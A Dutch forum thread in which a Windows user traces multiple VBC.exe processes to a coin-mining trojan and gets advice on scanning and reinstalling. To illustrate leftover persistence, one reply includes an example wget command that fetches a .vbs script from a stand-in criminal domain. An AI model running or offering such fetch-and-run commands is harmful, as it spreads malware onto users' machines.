Meerdere VBC.exe in Task Manager - hoe wat waar? - Windows clients

zaterdag 25 juni 2022 02:32

Acties:

0 Henk 'm!

Topicstarter

Het valt me op dat ik sinds een aantal dagen (of wellicht wel weken) meerdere VBC.exe processen heb lopen.
Vanaf het opstarten van Windows 10 laad ik helemaal niks. Geen torrent clients, geen automatische startup van wat voor programma dan ook, los van de dingen die echt moeten.

Ik dacht dat het eerst door audio software kwam die veel ram opsnoepte, maar dat is dus niet het geval aangezien ik dus niks actiefs heb draaien.

Heb al geprobeerd om de exe te verwijderen, maar dat kan alleen met super powers heb ik het idee.

Screenshot van het gebeuren. Er komen ook steeds meer VBC processen bij.
Als ik End Task doe komen ze gewoon weer terug. Niet in Windows Safe Mode trouwens.
Iets lijkt me niet helemaal koosjer hier. Heeft iemand een idee?

edit: moet erbij zeggen dat ik onlangs de bios heb terug gezet naar default. Kan het iets te maken hebben met de TPM?

Afbeeldingslocatie: https://i.ibb.co/DfrNXKy/10-BD1542-BB34-4-A1-D-B013-9-D41-A5-A09010.png

Afbeeldingslocatie: https://i.ibb.co/DfrNXKy/10-BD1542-BB34-4-A1-D-B013-9-D41-A5-A09010.png

[ Voor 28% gewijzigd door kaos001 op 25-06-2022 03:09 ]

Soundcloud

zaterdag 25 juni 2022 09:02

MarchelHoek

Klik met rechtermuisknop op het proces en open filepath.
Wellicht kan je daar al iets in zien waar het vandaan komt. Kan ook zijn dat het proces uit de system32 aangeroepen wordt, dan is scannen op malware een volgende stap

Bla Bla Bla

zaterdag 25 juni 2022 06:25

Acties:

+1 Henk 'm!

mjax

Klinkt als malware. Dus scannen en verwijderen in safe mode. Als dat niet helpt: Windows opnieuw installeren.

zaterdag 25 juni 2022 08:56

Acties:

+1 Henk 'm!

nescafe

Je kunt Process Explorer gebruiken om te zien welk proces (app of service) vbc.exe aanroept.

Home page | live.sysinternals.com/procexp.exe | Microsoft Store

[ Voor 3% gewijzigd door nescafe op 25-06-2022 09:00 ]

* Barca zweert ook bij fixedsys... althans bij mIRC de rest is comic sans

zaterdag 25 juni 2022 09:02

Acties:

Beste antwoord ✓
+3 Henk 'm!

MarchelHoek

Klik met rechtermuisknop op het proces en open filepath.
Wellicht kan je daar al iets in zien waar het vandaan komt. Kan ook zijn dat het proces uit de system32 aangeroepen wordt, dan is scannen op malware een volgende stap

Bla Bla Bla

zaterdag 25 juni 2022 09:14

Acties:

0 Henk 'm!

kaos001

Topicstarter

Dank allen. Was inderdaad malware. Heb Malware bytes z’n werk laten doen, probleem opgelost

Heb ik nu niet alsnog kans dat de boel straks op slot raakt? Bestanden vergrendeld of iets in die geest?

Soundcloud

zaterdag 25 juni 2022 18:20

Acties:

+1 Henk 'm!

Brahiewahiewa

boelkloedig

kaos001 schreef op zaterdag 25 juni 2022 @ 09:14:
Dank allen. Was inderdaad malware. Heb Malware bytes z’n werk laten doen, probleem opgelost

Heb ik nu niet alsnog kans dat de boel straks op slot raakt? Bestanden vergrendeld of iets in die geest?

Ja, dat heb je nog steeds. Je hebt nu alleen maar malwarebytes gedraaid en je gaat er van uit dat het probleem nu opgelost is. Maar malwarebytes haalt alleen maar de bestanden weg die hij herkent als malware. Als er bijv een task gescheduled is met

wget https://criminals4ever.ru/virus.vbs

dan kan die task gewoon blijven staan en telkens nog z'n werk doen. Afhankelijk van wat er allemaal nog staat, leidt dat tot foutmeldingen, vastlopers of een voortgezette besmetting.

Als je echt zeker wilt zijn moet je windows herinstalleren of heel precies onderzoek gaan doen naar hoe de besmetting ontstaan is, welke malware je allemaal binnengekregen hebt, wat de bekende propagatie mechanismen zijn van die malware, etc, etc.

QnJhaGlld2FoaWV3YQ==

zaterdag 25 juni 2022 18:29

Acties:

+1 Henk 'm!

Will_M

Intentionally Left Blank

@Brahiewahiewa Zou je die .vbs link even weg willen halen voordat er hier dadelijk weer mensen komen welke ooit door het I-Love-You virus besmet geraakt zijn

Je aanpassing is zelfs misschien nog wel béter dan het weg halen van het 'idee'

[ Voor 34% gewijzigd door Will_M op 25-06-2022 18:36 ]

Boldly going forward, 'cause we can't find reverse

zaterdag 25 juni 2022 18:33

Acties:

0 Henk 'm!

Saeverix

kaos001 schreef op zaterdag 25 juni 2022 @ 09:14:
Dank allen. Was inderdaad malware. Heb Malware bytes z’n werk laten doen, probleem opgelost

Heb ik nu niet alsnog kans dat de boel straks op slot raakt? Bestanden vergrendeld of iets in die geest?

Ik neem aan dat MalwareBytes je verteld heeft welke malware het was? Dan zou ik even goed zoeken wat het doet en hoe je dan helemaal kunt verwijderen. Vaak wordt er door Antivirus makers wel tooltjes geleverd voor specifieke virussen en malware.

Chookity-pok

zaterdag 25 juni 2022 23:40

Acties:

+1 Henk 'm!

kaos001

Topicstarter

Brahiewahiewa schreef op zaterdag 25 juni 2022 @ 18:20:
[...]

Als je echt zeker wilt zijn moet je windows herinstalleren of heel precies onderzoek gaan doen naar hoe de besmetting ontstaan is, welke malware je allemaal binnengekregen hebt, wat de bekende propagatie mechanismen zijn van die malware, etc, etc.

Heb bij nader inzien toch maar even een verse install gedaan van Windows. Wilde geen risico lopen

Saeverix schreef op zaterdag 25 juni 2022 @ 18:33:
[...]

Ik neem aan dat MalwareBytes je verteld heeft welke malware het was? Dan zou ik even goed zoeken wat het doet en hoe je dan helemaal kunt verwijderen. Vaak wordt er door Antivirus makers wel tooltjes geleverd voor specifieke virussen en malware.

Het was een trojaans paard die coins wilde minen, maar raar genoeg was het cpu verbruik laag. De verklaring waarom er zoveel processen draaide is misschien dat de malware opdracht gaf maar het niet aan de gang kreeg.

[ Voor 38% gewijzigd door kaos001 op 25-06-2022 23:45 ]

Soundcloud

Meerdere VBC.exe in Task Manager - hoe wat waar?

Vraag

Beste antwoord (via kaos001 op 25-06-2022 11:11)

Alle reacties